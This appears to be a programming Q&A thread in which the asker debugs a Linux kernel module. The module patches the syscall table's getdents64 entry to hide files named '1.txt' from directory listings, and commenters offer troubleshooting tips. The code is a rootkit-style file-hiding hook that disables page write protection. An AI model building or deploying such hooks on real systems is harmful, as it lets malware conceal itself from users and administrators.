# Linux kernel driver hooking syscall not working

Tags: c, linux, linux-device-driver, kernel-module

I am following this article https://exploit.ph/linux-kernel-hacking/2014/07/10/system-call-hooking/index.html, but I can't seems to make it work.
I tried to add some `printk` for debugging purposes, but something seems weird.
This is the code I am running -

```
#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/moduleparam.h>
#include <linux/unistd.h>
#include <linux/semaphore.h>
#include <linux/dirent.h>
#include <asm/cacheflush.h>

MODULE_AUTHOR("Tamir");
MODULE_LICENSE("GPL");

void **sys_call_table;

#define FILE_NAME "1.txt"

asmlinkage int (*original_getdents64) (unsigned int fd, struct linux_dirent64 *dirp, unsigned int count);

asmlinkage int sys_getdents64_hook(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count)
{
    printk("Inside hook :)");
    int rtn;
    struct linux_dirent64 *cur = dirp;
    int i = 0;
    rtn = original_getdents64(fd, dirp, count);
    while (i < rtn) {
        if (strncmp(cur->d_name, FILE_NAME, strlen(FILE_NAME)) == 0) {
            int reclen = cur->d_reclen;
            char *next_rec = (char *)cur + reclen;
            int len = (int)dirp + rtn - (int)next_rec;
            memmove(cur, next_rec, len);
            rtn -= reclen;
            continue;
        }
        i += cur->d_reclen;
        cur = (struct linux_dirent64*) ((char*)dirp + i);
    }
    return rtn;
}

int set_page_rw(unsigned long addr)
{
    unsigned int level;
    pte_t *pte = lookup_address(addr, &level);
    if (pte->pte &~ _PAGE_RW) pte->pte |= _PAGE_RW;
    return 0;
}

int set_page_ro(unsigned long addr)
{
    unsigned int level;
    pte_t *pte = lookup_address(addr, &level);
    pte->pte = pte->pte &~_PAGE_RW;
    return 0;
}

static int __init getdents_hook_init(void)
{
  printk("----------------\nInit Module\n");
  sys_call_table = (void*) 0xc18af1e0;
  original_getdents64 = sys_call_table[__NR_getdents64];

  set_page_rw(sys_call_table);
  sys_call_table[__NR_getdents64] = sys_getdents64_hook;
  printk("After hooked");
  return 0;
}

static void __exit getdents_hook_exit(void)
{
  printk("Exiting module\n-----------------------\n\n");
  sys_call_table[__NR_getdents64] = original_getdents64;
  set_page_ro(sys_call_table);
  return 0;
}

module_init(getdents_hook_init);
module_exit(getdents_hook_exit);
```

After compiling and inserting using `insmod` I use the `ls` command, but the file was still shown.
I used `dmesg` to see the kernel prints and I am seeing only the "Init Module" line and not the "After hooked".

When I am removing the module (rmmod) and looking again at the kernel prints I am seeing "after hooked" and "Exiting module".

I am not really sure what can I do or how can I debug it further to understand what went wrong.

**

Comment: What's your architecture? Also, add `\n` to *all* your `printk()` calls, otherwise you will not see the output on `dmesg`.

Comment: I added "\n", still not seeing it.
Affter ```rmmod``` I do see "After hooked" with the timestamp of the init.

Arch - i686
CPU on mode - 32-bit, 64-bit

Comment: What kernel version? x86_64 switched to `CONFIG_ARCH_HAS_SYSCALL_WRAPPER` in kernel version 4.17 and i386 switched in kernel version 5.7.

Comment: Is the magic number `(void *)0xc18af1e0` _really_ the location of the syscall table in your kernel?

Comment: The address is correct, I check it with ```grep sys_call_table /boot/System.map-`uname -r```

Also, this is the kernel version ```4.15.0-120-generic```